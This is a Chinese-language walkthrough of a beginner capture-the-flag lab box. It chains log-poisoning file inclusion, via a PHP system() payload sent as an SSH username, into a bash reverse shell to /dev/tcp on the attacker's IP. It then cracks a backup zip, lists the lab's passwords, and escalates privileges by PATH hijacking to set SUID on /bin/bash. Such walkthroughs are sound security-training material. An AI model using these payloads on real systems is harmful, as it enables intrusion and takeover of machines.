描述

Difficulty: Easy

A easy box for beginners, but not too easy. Good Luck.

Hint: Enumerate Property.


nmap扫存活

image-20221203121418124

1
2
kali   192.168.169.220
靶机 192.168.169.232

靶机扫描

image-20221203121440475

1
端口  22  80

80

image-20221203121651288

1
没什么有用的信息

目录扫描

image-20221203122354802

tasks

image-20221203122623901

blog-post

image-20221203122700484

1
没头绪 参考别人还有目录
1
gobuster dir -u http://192.168.169.232/blog-post/  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

image-20221203123101812

image-20221203123131264

模糊测试

  • wfuzz
1
wfuzz -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/Web-Content/big.txt --hw 0

image-20221203125540494

1
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt   -u http://192.168.169.232/blog-post/archives/randylogs.php?FUZZ=/etc/passwd  -fs 0

image-20221203125836278

1
两种方法,单纯的记录用
1
http://192.168.169.232/blog-post/archives/randylogs.php?file=/etc/passwd

image-20221203130024729

  • 之前/tasks目录下有个提示

image-20221203130213355

  • 可以访问系统文件,看先之前提到的 auth.log 日志:
1
http://192.168.169.232/blog-post/archives/randylogs.php?file=/var/log/auth.log
  • 发现会记录 ssh 登录的所有活动,那我们可以尝试添加恶意 PHP 代码作为用户名,该代码将从用户输入并执行命令。
1
ssh '<?php system($_REQUEST['cmd']);?>'@192.168.169.232

image-20221203133033950

1
2
3
其他问题靶机ip改为  192.168.169.233

view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig

image-20221203135038587

1
view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=whoami

image-20221203135152688

写入shell

  • nc 监听
  • url编码
    1
    bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
1
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
  • 访问
1
view-source:http://192.168.169.233/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'

image-20221203140056224

提权

image-20221203140527755

1
直接解码有密码,下载本地查看
  • 使用python开启http服务,也可以使用nc传输文件
1
python3 -m http.server 8000

image-20221203140809349

  • 下载并爆破密码
1
2
3
fcrackzip,

安装:apt-get install fcrackzip
1
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt user_backup.zip

image-20221203141401793

1
解压密码: !randybaby

image-20221203141544377

切换用户

1
2
3
ssh randy@192.168.169.233

randylovesgoldfish1998

image-20221203141721522

image-20221203141832524

  • 查看权限发现并不能改

借用别人的方法

  • 本地编辑 cat 文件,写入 shell:
1
2
3
4
5
6
7
8
9
echo 'chmod +s /bin/bash' > cat

chmod 777 cat

export PATH=/home/randy/tools:$PATH

./easysysinfo

/bin/bash -p

image-20221203142702850

  • 利用cat提权cat命令就不能使用

image-20221203143224102